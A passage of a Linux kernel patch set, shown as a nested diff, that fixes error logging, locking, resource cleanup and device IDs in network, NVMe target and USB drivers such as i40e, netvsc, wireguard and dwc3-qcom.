++				"VF %d failed to set unicast promiscuous mode err %pe aq_err %s\n",
+ 				vf->vf_id,
+-				aq_ret,
++				ERR_PTR(aq_ret),
+ 				i40e_aq_str(&pf->hw, aq_err));
+ 
+ 			if (!aq_tmp)
+@@ -3615,8 +3615,8 @@ static void i40e_del_all_cloud_filters(struct i40e_vf *vf)
+ 			ret = i40e_add_del_cloud_filter(vsi, cfilter, false);
+ 		if (ret)
+ 			dev_err(&pf->pdev->dev,
+-				"VF %d: Failed to delete cloud filter, err %d aq_err %s\n",
+-				vf->vf_id, ret,
++				"VF %d: Failed to delete cloud filter, err %pe aq_err %s\n",
++				vf->vf_id, ERR_PTR(ret),
+ 				i40e_aq_str(&pf->hw,
+ 					    pf->hw.aq.asq_last_status));
+ 
+@@ -3718,8 +3718,8 @@ static int i40e_vc_del_cloud_filter(struct i40e_vf *vf, u8 *msg)
+ 		ret = i40e_add_del_cloud_filter(vsi, &cfilter, false);
+ 	if (ret) {
+ 		dev_err(&pf->pdev->dev,
+-			"VF %d: Failed to delete cloud filter, err %d aq_err %s\n",
+-			vf->vf_id, ret,
++			"VF %d: Failed to delete cloud filter, err %pe aq_err %s\n",
++			vf->vf_id, ERR_PTR(ret),
+ 			i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		goto err;
+ 	}
+@@ -3774,7 +3774,7 @@ static int i40e_vc_add_cloud_filter(struct i40e_vf *vf, u8 *msg)
+ 	struct i40e_pf *pf = vf->pf;
+ 	struct i40e_vsi *vsi = NULL;
+ 	int aq_ret = 0;
+-	int i, ret;
++	int i;
+ 
+ 	if (!i40e_sync_vf_state(vf, I40E_VF_STATE_ACTIVE)) {
+ 		aq_ret = I40E_ERR_PARAM;
+@@ -3798,8 +3798,10 @@ static int i40e_vc_add_cloud_filter(struct i40e_vf *vf, u8 *msg)
+ 	}
+ 
+ 	cfilter = kzalloc(sizeof(*cfilter), GFP_KERNEL);
+-	if (!cfilter)
+-		return -ENOMEM;
++	if (!cfilter) {
++		aq_ret = -ENOMEM;
++		goto err_out;
++	}
+ 
+ 	/* parse destination mac address */
+ 	for (i = 0; i < ETH_ALEN; i++)
+@@ -3847,13 +3849,13 @@ static int i40e_vc_add_cloud_filter(struct i40e_vf *vf, u8 *msg)
+ 
+ 	/* Adding cloud filter programmed as TC filter */
+ 	if (tcf.dst_port)
+-		ret = i40e_add_del_cloud_filter_big_buf(vsi, cfilter, true);
++		aq_ret = i40e_add_del_cloud_filter_big_buf(vsi, cfilter, true);
+ 	else
+-		ret = i40e_add_del_cloud_filter(vsi, cfilter, true);
+-	if (ret) {
++		aq_ret = i40e_add_del_cloud_filter(vsi, cfilter, true);
++	if (aq_ret) {
+ 		dev_err(&pf->pdev->dev,
+-			"VF %d: Failed to add cloud filter, err %d aq_err %s\n",
+-			vf->vf_id, ret,
++			"VF %d: Failed to add cloud filter, err %pe aq_err %s\n",
++			vf->vf_id, ERR_PTR(aq_ret),
+ 			i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		goto err_free;
+ 	}
+diff --git a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_flows.c b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_flows.c
+index 934c199667b59..5c4a4d3557702 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_flows.c
++++ b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_flows.c
+@@ -1069,6 +1069,7 @@ int otx2_add_flow(struct otx2_nic *pfvf, struct ethtool_rxnfc *nfc)
+ 	struct ethhdr *eth_hdr;
+ 	bool new = false;
+ 	int err = 0;
++	u64 vf_num;
+ 	u32 ring;
+ 
+ 	if (!flow_cfg->max_flows) {
+@@ -1081,7 +1082,21 @@ int otx2_add_flow(struct otx2_nic *pfvf, struct ethtool_rxnfc *nfc)
+ 	if (!(pfvf->flags & OTX2_FLAG_NTUPLE_SUPPORT))
+ 		return -ENOMEM;
+ 
+-	if (ring >= pfvf->hw.rx_queues && fsp->ring_cookie != RX_CLS_FLOW_DISC)
++	/* Number of queues on a VF can be greater or less than
++	 * the PF's queue. Hence no need to check for the
++	 * queue count. Hence no need to check queue count if PF
++	 * is installing for its VF. Below is the expected vf_num value
++	 * based on the ethtool commands.
++	 *
++	 * e.g.
++	 * 1. ethtool -U <netdev> ... action -1  ==> vf_num:255
++	 * 2. ethtool -U <netdev> ... action <queue_num>  ==> vf_num:0
++	 * 3. ethtool -U <netdev> ... vf <vf_idx> queue <queue_num>  ==>
++	 *    vf_num:vf_idx+1
++	 */
++	vf_num = ethtool_get_flow_spec_ring_vf(fsp->ring_cookie);
++	if (!is_otx2_vf(pfvf->pcifunc) && !vf_num &&
++	    ring >= pfvf->hw.rx_queues && fsp->ring_cookie != RX_CLS_FLOW_DISC)
+ 		return -EINVAL;
+ 
+ 	if (fsp->location >= otx2_get_maxflows(flow_cfg))
+@@ -1163,6 +1178,9 @@ int otx2_add_flow(struct otx2_nic *pfvf, struct ethtool_rxnfc *nfc)
+ 		flow_cfg->nr_flows++;
+ 	}
+ 
++	if (flow->is_vf)
++		netdev_info(pfvf->netdev,
++			    "Make sure that VF's queue number is within its queue limit\n");
+ 	return 0;
+ }
+ 
+diff --git a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_pf.c b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_pf.c
+index c724131172f3f..1d2d72c60a12c 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_pf.c
++++ b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_pf.c
+@@ -1919,6 +1919,8 @@ int otx2_stop(struct net_device *netdev)
+ 	/* Clear RSS enable flag */
+ 	rss = &pf->hw.rss_info;
+ 	rss->enable = false;
++	if (!netif_is_rxfh_configured(netdev))
++		kfree(rss->rss_ctx[DEFAULT_RSS_CONTEXT_GROUP]);
+ 
+ 	/* Cleanup Queue IRQ */
+ 	vec = pci_irq_vector(pf->pdev,
+diff --git a/drivers/net/ethernet/xilinx/xilinx_axienet_main.c b/drivers/net/ethernet/xilinx/xilinx_axienet_main.c
+index d14648558338b..5ea9dc251dd9a 100644
+--- a/drivers/net/ethernet/xilinx/xilinx_axienet_main.c
++++ b/drivers/net/ethernet/xilinx/xilinx_axienet_main.c
+@@ -821,7 +821,7 @@ axienet_start_xmit(struct sk_buff *skb, struct net_device *ndev)
+ 		if (lp->features & XAE_FEATURE_FULL_TX_CSUM) {
+ 			/* Tx Full Checksum Offload Enabled */
+ 			cur_p->app0 |= 2;
+-		} else if (lp->features & XAE_FEATURE_PARTIAL_RX_CSUM) {
++		} else if (lp->features & XAE_FEATURE_PARTIAL_TX_CSUM) {
+ 			csum_start_off = skb_transport_offset(skb);
+ 			csum_index_off = csum_start_off + skb->csum_offset;
+ 			/* Tx Partial Checksum Offload Enabled */
+diff --git a/drivers/net/hyperv/netvsc_drv.c b/drivers/net/hyperv/netvsc_drv.c
+index 89eb4f179a3ce..0285894c892ab 100644
+--- a/drivers/net/hyperv/netvsc_drv.c
++++ b/drivers/net/hyperv/netvsc_drv.c
+@@ -2204,9 +2204,6 @@ static int netvsc_vf_join(struct net_device *vf_netdev,
+ 		goto upper_link_failed;
+ 	}
+ 
+-	/* set slave flag before open to prevent IPv6 addrconf */
+-	vf_netdev->flags |= IFF_SLAVE;
+-
+ 	schedule_delayed_work(&ndev_ctx->vf_takeover, VF_TAKEOVER_INT);
+ 
+ 	call_netdevice_notifiers(NETDEV_JOIN, vf_netdev);
+@@ -2313,16 +2310,18 @@ static struct net_device *get_netvsc_byslot(const struct net_device *vf_netdev)
+ 
+ 	}
+ 
+-	/* Fallback path to check synthetic vf with
+-	 * help of mac addr
++	/* Fallback path to check synthetic vf with help of mac addr.
++	 * Because this function can be called before vf_netdev is
++	 * initialized (NETDEV_POST_INIT) when its perm_addr has not been copied
++	 * from dev_addr, also try to match to its dev_addr.
++	 * Note: On Hyper-V and Azure, it's not possible to set a MAC address
++	 * on a VF that matches to the MAC of a unrelated NETVSC device.
+ 	 */
+ 	list_for_each_entry(ndev_ctx, &netvsc_dev_list, list) {
+ 		ndev = hv_get_drvdata(ndev_ctx->device_ctx);
+-		if (ether_addr_equal(vf_netdev->perm_addr, ndev->perm_addr)) {
+-			netdev_notice(vf_netdev,
+-				      "falling back to mac addr based matching\n");
++		if (ether_addr_equal(vf_netdev->perm_addr, ndev->perm_addr) ||
++		    ether_addr_equal(vf_netdev->dev_addr, ndev->perm_addr))
+ 			return ndev;
+-		}
+ 	}
+ 
+ 	netdev_notice(vf_netdev,
+@@ -2330,6 +2329,19 @@ static struct net_device *get_netvsc_byslot(const struct net_device *vf_netdev)
+ 	return NULL;
+ }
+ 
++static int netvsc_prepare_bonding(struct net_device *vf_netdev)
++{
++	struct net_device *ndev;
++
++	ndev = get_netvsc_byslot(vf_netdev);
++	if (!ndev)
++		return NOTIFY_DONE;
++
++	/* set slave flag before open to prevent IPv6 addrconf */
++	vf_netdev->flags |= IFF_SLAVE;
++	return NOTIFY_DONE;
++}
++
+ static int netvsc_register_vf(struct net_device *vf_netdev)
+ {
+ 	struct net_device_context *net_device_ctx;
+@@ -2529,15 +2541,6 @@ static int netvsc_probe(struct hv_device *dev,
+ 		goto devinfo_failed;
+ 	}
+ 
+-	nvdev = rndis_filter_device_add(dev, device_info);
+-	if (IS_ERR(nvdev)) {
+-		ret = PTR_ERR(nvdev);
+-		netdev_err(net, "unable to add netvsc device (ret %d)\n", ret);
+-		goto rndis_failed;
+-	}
+-
+-	eth_hw_addr_set(net, device_info->mac_adr);
+-
+ 	/* We must get rtnl lock before scheduling nvdev->subchan_work,
+ 	 * otherwise netvsc_subchan_work() can get rtnl lock first and wait
+ 	 * all subchannels to show up, but that may not happen because
+@@ -2545,9 +2548,23 @@ static int netvsc_probe(struct hv_device *dev,
+ 	 * -> ... -> device_add() -> ... -> __device_attach() can't get
+ 	 * the device lock, so all the subchannels can't be processed --
+ 	 * finally netvsc_subchan_work() hangs forever.
++	 *
++	 * The rtnl lock also needs to be held before rndis_filter_device_add()
++	 * which advertises nvsp_2_vsc_capability / sriov bit, and triggers
++	 * VF NIC offering and registering. If VF NIC finished register_netdev()
++	 * earlier it may cause name based config failure.
+ 	 */
+ 	rtnl_lock();
+ 
++	nvdev = rndis_filter_device_add(dev, device_info);
++	if (IS_ERR(nvdev)) {
++		ret = PTR_ERR(nvdev);
++		netdev_err(net, "unable to add netvsc device (ret %d)\n", ret);
++		goto rndis_failed;
++	}
++
++	eth_hw_addr_set(net, device_info->mac_adr);
++
+ 	if (nvdev->num_chn > 1)
+ 		schedule_work(&nvdev->subchan_work);
+ 
+@@ -2581,9 +2598,9 @@ static int netvsc_probe(struct hv_device *dev,
+ 	return 0;
+ 
+ register_failed:
+-	rtnl_unlock();
+ 	rndis_filter_device_remove(dev, nvdev);
+ rndis_failed:
++	rtnl_unlock();
+ 	netvsc_devinfo_put(device_info);
+ devinfo_failed:
+ 	free_percpu(net_device_ctx->vf_stats);
+@@ -2749,6 +2766,8 @@ static int netvsc_netdev_event(struct notifier_block *this,
+ 		return NOTIFY_DONE;
+ 
+ 	switch (event) {
++	case NETDEV_POST_INIT:
++		return netvsc_prepare_bonding(event_dev);
+ 	case NETDEV_REGISTER:
+ 		return netvsc_register_vf(event_dev);
+ 	case NETDEV_UNREGISTER:
+@@ -2784,12 +2803,17 @@ static int __init netvsc_drv_init(void)
+ 	}
+ 	netvsc_ring_bytes = ring_size * PAGE_SIZE;
+ 
++	register_netdevice_notifier(&netvsc_netdev_notifier);
++
+ 	ret = vmbus_driver_register(&netvsc_drv);
+ 	if (ret)
+-		return ret;
++		goto err_vmbus_reg;
+ 
+-	register_netdevice_notifier(&netvsc_netdev_notifier);
+ 	return 0;
++
++err_vmbus_reg:
++	unregister_netdevice_notifier(&netvsc_netdev_notifier);
++	return ret;
+ }
+ 
+ MODULE_LICENSE("GPL");
+diff --git a/drivers/net/usb/ax88179_178a.c b/drivers/net/usb/ax88179_178a.c
+index aff39bf3161de..4ea0e155bb0d5 100644
+--- a/drivers/net/usb/ax88179_178a.c
++++ b/drivers/net/usb/ax88179_178a.c
+@@ -1583,11 +1583,11 @@ static int ax88179_reset(struct usbnet *dev)
+ 
+ 	*tmp16 = AX_PHYPWR_RSTCTL_IPRL;
+ 	ax88179_write_cmd(dev, AX_ACCESS_MAC, AX_PHYPWR_RSTCTL, 2, 2, tmp16);
+-	msleep(200);
++	msleep(500);
+ 
+ 	*tmp = AX_CLK_SELECT_ACS | AX_CLK_SELECT_BCS;
+ 	ax88179_write_cmd(dev, AX_ACCESS_MAC, AX_CLK_SELECT, 1, 1, tmp);
+-	msleep(100);
++	msleep(200);
+ 
+ 	/* Ethernet PHY Auto Detach*/
+ 	ax88179_auto_detach(dev);
+diff --git a/drivers/net/wireguard/device.c b/drivers/net/wireguard/device.c
+index d58e9f818d3b7..895a621c9e267 100644
+--- a/drivers/net/wireguard/device.c
++++ b/drivers/net/wireguard/device.c
+@@ -209,7 +209,7 @@ static netdev_tx_t wg_xmit(struct sk_buff *skb, struct net_device *dev)
+ 	 */
+ 	while (skb_queue_len(&peer->staged_packet_queue) > MAX_STAGED_PACKETS) {
+ 		dev_kfree_skb(__skb_dequeue(&peer->staged_packet_queue));
+-		++dev->stats.tx_dropped;
++		DEV_STATS_INC(dev, tx_dropped);
+ 	}
+ 	skb_queue_splice_tail(&packets, &peer->staged_packet_queue);
+ 	spin_unlock_bh(&peer->staged_packet_queue.lock);
+@@ -227,7 +227,7 @@ err_icmp:
+ 	else if (skb->protocol == htons(ETH_P_IPV6))
+ 		icmpv6_ndo_send(skb, ICMPV6_DEST_UNREACH, ICMPV6_ADDR_UNREACH, 0);
+ err:
+-	++dev->stats.tx_errors;
++	DEV_STATS_INC(dev, tx_errors);
+ 	kfree_skb(skb);
+ 	return ret;
+ }
+diff --git a/drivers/net/wireguard/receive.c b/drivers/net/wireguard/receive.c
+index 0b3f0c8435509..a176653c88616 100644
+--- a/drivers/net/wireguard/receive.c
++++ b/drivers/net/wireguard/receive.c
+@@ -416,20 +416,20 @@ dishonest_packet_peer:
+ 	net_dbg_skb_ratelimited("%s: Packet has unallowed src IP (%pISc) from peer %llu (%pISpfsc)\n",
+ 				dev->name, skb, peer->internal_id,
+ 				&peer->endpoint.addr);
+-	++dev->stats.rx_errors;
+-	++dev->stats.rx_frame_errors;
++	DEV_STATS_INC(dev, rx_errors);
++	DEV_STATS_INC(dev, rx_frame_errors);
+ 	goto packet_processed;
+ dishonest_packet_type:
+ 	net_dbg_ratelimited("%s: Packet is neither ipv4 nor ipv6 from peer %llu (%pISpfsc)\n",
+ 			    dev->name, peer->internal_id, &peer->endpoint.addr);
+-	++dev->stats.rx_errors;
+-	++dev->stats.rx_frame_errors;
++	DEV_STATS_INC(dev, rx_errors);
++	DEV_STATS_INC(dev, rx_frame_errors);
+ 	goto packet_processed;
+ dishonest_packet_size:
+ 	net_dbg_ratelimited("%s: Packet has incorrect size from peer %llu (%pISpfsc)\n",
+ 			    dev->name, peer->internal_id, &peer->endpoint.addr);
+-	++dev->stats.rx_errors;
+-	++dev->stats.rx_length_errors;
++	DEV_STATS_INC(dev, rx_errors);
++	DEV_STATS_INC(dev, rx_length_errors);
+ 	goto packet_processed;
+ packet_processed:
+ 	dev_kfree_skb(skb);
+diff --git a/drivers/net/wireguard/send.c b/drivers/net/wireguard/send.c
+index 95c853b59e1da..0d48e0f4a1ba3 100644
+--- a/drivers/net/wireguard/send.c
++++ b/drivers/net/wireguard/send.c
+@@ -333,7 +333,8 @@ err:
+ void wg_packet_purge_staged_packets(struct wg_peer *peer)
+ {
+ 	spin_lock_bh(&peer->staged_packet_queue.lock);
+-	peer->device->dev->stats.tx_dropped += peer->staged_packet_queue.qlen;
++	DEV_STATS_ADD(peer->device->dev, tx_dropped,
++		      peer->staged_packet_queue.qlen);
+ 	__skb_queue_purge(&peer->staged_packet_queue);
+ 	spin_unlock_bh(&peer->staged_packet_queue.lock);
+ }
+diff --git a/drivers/nvme/target/fabrics-cmd.c b/drivers/nvme/target/fabrics-cmd.c
+index 43b5bd8bb6a52..d8da840a1c0ed 100644
+--- a/drivers/nvme/target/fabrics-cmd.c
++++ b/drivers/nvme/target/fabrics-cmd.c
+@@ -244,6 +244,8 @@ static void nvmet_execute_admin_connect(struct nvmet_req *req)
+ 		goto out;
+ 	}
+ 
++	d->subsysnqn[NVMF_NQN_FIELD_LEN - 1] = '\0';
++	d->hostnqn[NVMF_NQN_FIELD_LEN - 1] = '\0';
+ 	status = nvmet_alloc_ctrl(d->subsysnqn, d->hostnqn, req,
+ 				  le32_to_cpu(c->kato), &ctrl);
+ 	if (status)
+@@ -313,6 +315,8 @@ static void nvmet_execute_io_connect(struct nvmet_req *req)
+ 		goto out;
+ 	}
+ 
++	d->subsysnqn[NVMF_NQN_FIELD_LEN - 1] = '\0';
++	d->hostnqn[NVMF_NQN_FIELD_LEN - 1] = '\0';
+ 	ctrl = nvmet_ctrl_find_get(d->subsysnqn, d->hostnqn,
+ 				   le16_to_cpu(d->cntlid), req);
+ 	if (!ctrl) {
+diff --git a/drivers/s390/block/dasd.c b/drivers/s390/block/dasd.c
+index 04d9b1d4b1ba9..f207de4a87a0f 100644
+--- a/drivers/s390/block/dasd.c
++++ b/drivers/s390/block/dasd.c
+@@ -673,18 +673,20 @@ static void dasd_profile_start(struct dasd_block *block,
+ 	 * we count each request only once.
+ 	 */
+ 	device = cqr->startdev;
+-	if (device->profile.data) {
+-		counter = 1; /* request is not yet queued on the start device */
+-		list_for_each(l, &device->ccw_queue)
+-			if (++counter >= 31)
+-				break;
+-	}
++	if (!device->profile.data)
++		return;
++
++	spin_lock(get_ccwdev_lock(device->cdev));
++	counter = 1; /* request is not yet queued on the start device */
++	list_for_each(l, &device->ccw_queue)
++		if (++counter >= 31)
++			break;
++	spin_unlock(get_ccwdev_lock(device->cdev));
++
+ 	spin_lock(&device->profile.lock);
+-	if (device->profile.data) {
+-		device->profile.data->dasd_io_nr_req[counter]++;
+-		if (rq_data_dir(req) == READ)
+-			device->profile.data->dasd_read_nr_req[counter]++;
+-	}
++	device->profile.data->dasd_io_nr_req[counter]++;
++	if (rq_data_dir(req) == READ)
++		device->profile.data->dasd_read_nr_req[counter]++;
+ 	spin_unlock(&device->profile.lock);
+ }
+ 
+diff --git a/drivers/usb/cdns3/cdnsp-ring.c b/drivers/usb/cdns3/cdnsp-ring.c
+index b23e543b3a3d5..8a2cc0405a4ad 100644
+--- a/drivers/usb/cdns3/cdnsp-ring.c
++++ b/drivers/usb/cdns3/cdnsp-ring.c
+@@ -1522,6 +1522,7 @@ irqreturn_t cdnsp_thread_irq_handler(int irq, void *data)
+ 	unsigned long flags;
+ 	int counter = 0;
+ 
++	local_bh_disable();
+ 	spin_lock_irqsave(&pdev->lock, flags);
+ 
+ 	if (pdev->cdnsp_state & (CDNSP_STATE_HALTED | CDNSP_STATE_DYING)) {
+@@ -1534,6 +1535,7 @@ irqreturn_t cdnsp_thread_irq_handler(int irq, void *data)
+ 			cdnsp_died(pdev);
+ 
+ 		spin_unlock_irqrestore(&pdev->lock, flags);
++		local_bh_enable();
+ 		return IRQ_HANDLED;
+ 	}
+ 
+@@ -1550,6 +1552,7 @@ irqreturn_t cdnsp_thread_irq_handler(int irq, void *data)
+ 	cdnsp_update_erst_dequeue(pdev, event_ring_deq, 1);
+ 
+ 	spin_unlock_irqrestore(&pdev->lock, flags);
++	local_bh_enable();
+ 
+ 	return IRQ_HANDLED;
+ }
+diff --git a/drivers/usb/dwc2/hcd_intr.c b/drivers/usb/dwc2/hcd_intr.c
+index c9740caa5974b..9e85cbb0c4f15 100644
+--- a/drivers/usb/dwc2/hcd_intr.c
++++ b/drivers/usb/dwc2/hcd_intr.c
+@@ -2015,15 +2015,17 @@ static void dwc2_hc_n_intr(struct dwc2_hsotg *hsotg, int chnum)
+ {
+ 	struct dwc2_qtd *qtd;
+ 	struct dwc2_host_chan *chan;
+-	u32 hcint, hcintmsk;
++	u32 hcint, hcintraw, hcintmsk;
+ 
+ 	chan = hsotg->hc_ptr_array[chnum];
+ 
+-	hcint = dwc2_readl(hsotg, HCINT(chnum));
++	hcintraw = dwc2_readl(hsotg, HCINT(chnum));
+ 	hcintmsk = dwc2_readl(hsotg, HCINTMSK(chnum));
++	hcint = hcintraw & hcintmsk;
++	dwc2_writel(hsotg, hcint, HCINT(chnum));
++
+ 	if (!chan) {
+ 		dev_err(hsotg->dev, "## hc_ptr_array for channel is NULL ##\n");
+-		dwc2_writel(hsotg, hcint, HCINT(chnum));
+ 		return;
+ 	}
+ 
+@@ -2032,11 +2034,9 @@ static void dwc2_hc_n_intr(struct dwc2_hsotg *hsotg, int chnum)
+ 			 chnum);
+ 		dev_vdbg(hsotg->dev,
+ 			 "  hcint 0x%08x, hcintmsk 0x%08x, hcint&hcintmsk 0x%08x\n",
+-			 hcint, hcintmsk, hcint & hcintmsk);
++			 hcintraw, hcintmsk, hcint);
+ 	}
+ 
+-	dwc2_writel(hsotg, hcint, HCINT(chnum));
+-
+ 	/*
+ 	 * If we got an interrupt after someone called
+ 	 * dwc2_hcd_endpoint_disable() we don't want to crash below
+@@ -2046,8 +2046,7 @@ static void dwc2_hc_n_intr(struct dwc2_hsotg *hsotg, int chnum)
+ 		return;
+ 	}
+ 
+-	chan->hcint = hcint;
+-	hcint &= hcintmsk;
++	chan->hcint = hcintraw;
+ 
+ 	/*
+ 	 * If the channel was halted due to a dequeue, the qtd list might
+diff --git a/drivers/usb/dwc3/core.c b/drivers/usb/dwc3/core.c
+index a811db88eedae..1f23c96fa94f8 100644
+--- a/drivers/usb/dwc3/core.c
++++ b/drivers/usb/dwc3/core.c
+@@ -2036,6 +2036,8 @@ static int dwc3_probe(struct platform_device *pdev)
+ 
+ 	pm_runtime_put(dev);
+ 
++	dma_set_max_seg_size(dev, UINT_MAX);
++
+ 	return 0;
+ 
+ err5:
+diff --git a/drivers/usb/dwc3/drd.c b/drivers/usb/dwc3/drd.c
+index 039bf241769af..57ddd2e43022e 100644
+--- a/drivers/usb/dwc3/drd.c
++++ b/drivers/usb/dwc3/drd.c
+@@ -505,6 +505,7 @@ static int dwc3_setup_role_switch(struct dwc3 *dwc)
+ 		dwc->role_switch_default_mode = USB_DR_MODE_PERIPHERAL;
+ 		mode = DWC3_GCTL_PRTCAP_DEVICE;
+ 	}
++	dwc3_set_mode(dwc, mode);
+ 
+ 	dwc3_role_switch.fwnode = dev_fwnode(dwc->dev);
+ 	dwc3_role_switch.set = dwc3_usb_role_switch_set;
+@@ -526,7 +527,6 @@ static int dwc3_setup_role_switch(struct dwc3 *dwc)
+ 		}
+ 	}
+ 
+-	dwc3_set_mode(dwc, mode);
+ 	return 0;
+ }
+ #else
+diff --git a/drivers/usb/dwc3/dwc3-qcom.c b/drivers/usb/dwc3/dwc3-qcom.c
+index 72c22851d7eef..93747ab2cf5b8 100644
+--- a/drivers/usb/dwc3/dwc3-qcom.c
++++ b/drivers/usb/dwc3/dwc3-qcom.c
+@@ -550,7 +550,7 @@ static int dwc3_qcom_setup_irq(struct platform_device *pdev)
+ 		irq_set_status_flags(irq, IRQ_NOAUTOEN);
+ 		ret = devm_request_threaded_irq(qcom->dev, irq, NULL,
+ 					qcom_dwc3_resume_irq,
+-					IRQF_TRIGGER_HIGH | IRQF_ONESHOT,
++					IRQF_ONESHOT,
+ 					"qcom_dwc3 HS", qcom);
+ 		if (ret) {
+ 			dev_err(qcom->dev, "hs_phy_irq failed: %d\n", ret);
+@@ -565,7 +565,7 @@ static int dwc3_qcom_setup_irq(struct platform_device *pdev)
+ 		irq_set_status_flags(irq, IRQ_NOAUTOEN);
+ 		ret = devm_request_threaded_irq(qcom->dev, irq, NULL,
+ 					qcom_dwc3_resume_irq,
+-					IRQF_TRIGGER_HIGH | IRQF_ONESHOT,
++					IRQF_ONESHOT,
+ 					"qcom_dwc3 DP_HS", qcom);
+ 		if (ret) {
+ 			dev_err(qcom->dev, "dp_hs_phy_irq failed: %d\n", ret);
+@@ -580,7 +580,7 @@ static int dwc3_qcom_setup_irq(struct platform_device *pdev)
+ 		irq_set_status_flags(irq, IRQ_NOAUTOEN);
+ 		ret = devm_request_threaded_irq(qcom->dev, irq, NULL,
+ 					qcom_dwc3_resume_irq,
+-					IRQF_TRIGGER_HIGH | IRQF_ONESHOT,
++					IRQF_ONESHOT,
+ 					"qcom_dwc3 DM_HS", qcom);
+ 		if (ret) {
+ 			dev_err(qcom->dev, "dm_hs_phy_irq failed: %d\n", ret);
+@@ -595,7 +595,7 @@ static int dwc3_qcom_setup_irq(struct platform_device *pdev)
+ 		irq_set_status_flags(irq, IRQ_NOAUTOEN);
+ 		ret = devm_request_threaded_irq(qcom->dev, irq, NULL,
+ 					qcom_dwc3_resume_irq,
+-					IRQF_TRIGGER_HIGH | IRQF_ONESHOT,
++					IRQF_ONESHOT,
+ 					"qcom_dwc3 SS", qcom);
+ 		if (ret) {
+ 			dev_err(qcom->dev, "ss_phy_irq failed: %d\n", ret);
+@@ -759,6 +759,7 @@ static int dwc3_qcom_of_register_core(struct platform_device *pdev)
+ 	if (!qcom->dwc3) {
+ 		ret = -ENODEV;
+ 		dev_err(dev, "failed to get dwc3 platform device\n");
++		of_platform_depopulate(dev);
+ 	}
+ 
+ node_put:
+@@ -767,9 +768,9 @@ node_put:
+ 	return ret;
+ }
+ 
+-static struct platform_device *
+-dwc3_qcom_create_urs_usb_platdev(struct device *dev)
++static struct platform_device *dwc3_qcom_create_urs_usb_platdev(struct device *dev)
+ {
++	struct platform_device *urs_usb = NULL;
+ 	struct fwnode_handle *fwh;
+ 	struct acpi_device *adev;
+ 	char name[8];
+@@ -789,9 +790,26 @@ dwc3_qcom_create_urs_usb_platdev(struct device *dev)
+ 
+ 	adev = to_acpi_device_node(fwh);
+ 	if (!adev)
+-		return NULL;
++		goto err_put_handle;
++
++	urs_usb = acpi_create_platform_device(adev, NULL);
++	if (IS_ERR_OR_NULL(urs_usb))
++		goto err_put_handle;
++
++	return urs_usb;
++
++err_put_handle:
++	fwnode_handle_put(fwh);
++
++	return urs_usb;
++}
+ 
+-	return acpi_create_platform_device(adev, NULL);
++static void dwc3_qcom_destroy_urs_usb_platdev(struct platform_device *urs_usb)
++{
++	struct fwnode_handle *fwh = urs_usb->dev.fwnode;
++
++	platform_device_unregister(urs_usb);
++	fwnode_handle_put(fwh);
+ }
+ 
+ static int dwc3_qcom_probe(struct platform_device *pdev)
+@@ -876,13 +894,13 @@ static int dwc3_qcom_probe(struct platform_device *pdev)
+ 	qcom->qscratch_base = devm_ioremap_resource(dev, parent_res);
+ 	if (IS_ERR(qcom->qscratch_base)) {
+ 		ret = PTR_ERR(qcom->qscratch_base);
+-		goto clk_disable;
++		goto free_urs;
+ 	}
+ 
+ 	ret = dwc3_qcom_setup_irq(pdev);
+ 	if (ret) {
+ 		dev_err(dev, "failed to setup IRQs, err=%d\n", ret);
+-		goto clk_disable;
++		goto free_urs;
+ 	}
+ 
+ 	/*
+@@ -901,7 +919,7 @@ static int dwc3_qcom_probe(struct platform_device *pdev)
+ 
+ 	if (ret) {
+ 		dev_err(dev, "failed to register DWC3 Core, err=%d\n", ret);
+-		goto depopulate;
++		goto free_urs;
+ 	}
+ 
+ 	ret = dwc3_qcom_interconnect_init(qcom);
+@@ -933,10 +951,16 @@ static int dwc3_qcom_probe(struct platform_device *pdev)
+ interconnect_exit:
+ 	dwc3_qcom_interconnect_exit(qcom);
+ depopulate:
+-	if (np)
++	if (np) {
+ 		of_platform_depopulate(&pdev->dev);
+-	else
+-		platform_device_put(pdev);
++	} else {
++		device_remove_software_node(&qcom->dwc3->dev);
++		platform_device_del(qcom->dwc3);
++	}
++	platform_device_put(qcom->dwc3);
++free_urs:
++	if (qcom->urs_usb)
++		dwc3_qcom_destroy_urs_usb_platdev(qcom->urs_usb);
+ clk_disable:
+ 	for (i = qcom->num_clocks - 1; i >= 0; i--) {
+ 		clk_disable_unprepare(qcom->clks[i]);
+@@ -955,11 +979,16 @@ static int dwc3_qcom_remove(struct platform_device *pdev)
+ 	struct device *dev = &pdev->dev;
+ 	int i;
+ 
+-	device_remove_software_node(&qcom->dwc3->dev);
+-	if (np)
++	if (np) {
+ 		of_platform_depopulate(&pdev->dev);
+-	else
+-		platform_device_put(pdev);
++	} else {
++		device_remove_software_node(&qcom->dwc3->dev);
++		platform_device_del(qcom->dwc3);
++	}
++	platform_device_put(qcom->dwc3);
++
++	if (qcom->urs_usb)
++		dwc3_qcom_destroy_urs_usb_platdev(qcom->urs_usb);
+ 
+ 	for (i = qcom->num_clocks - 1; i >= 0; i--) {
+ 		clk_disable_unprepare(qcom->clks[i]);
+diff --git a/drivers/usb/serial/option.c b/drivers/usb/serial/option.c
+index b9dd714a3ae69..7f2aa72d52e65 100644
+--- a/drivers/usb/serial/option.c
++++ b/drivers/usb/serial/option.c
+@@ -203,8 +203,8 @@ static void option_instat_callback(struct urb *urb);
+ #define DELL_PRODUCT_5829E_ESIM			0x81e4
+ #define DELL_PRODUCT_5829E			0x81e6
+ 
+-#define DELL_PRODUCT_FM101R			0x8213
+-#define DELL_PRODUCT_FM101R_ESIM		0x8215
++#define DELL_PRODUCT_FM101R_ESIM		0x8213
++#define DELL_PRODUCT_FM101R			0x8215
+ 
+ #define KYOCERA_VENDOR_ID			0x0c88
+ #define KYOCERA_PRODUCT_KPC650			0x17da
+@@ -609,6 +609,8 @@ static void option_instat_callback(struct urb *urb);
+ #define UNISOC_VENDOR_ID			0x1782
+ /* TOZED LT70-C based on UNISOC SL8563 uses UNISOC's vendor ID */
+ #define TOZED_PRODUCT_LT70C			0x4055
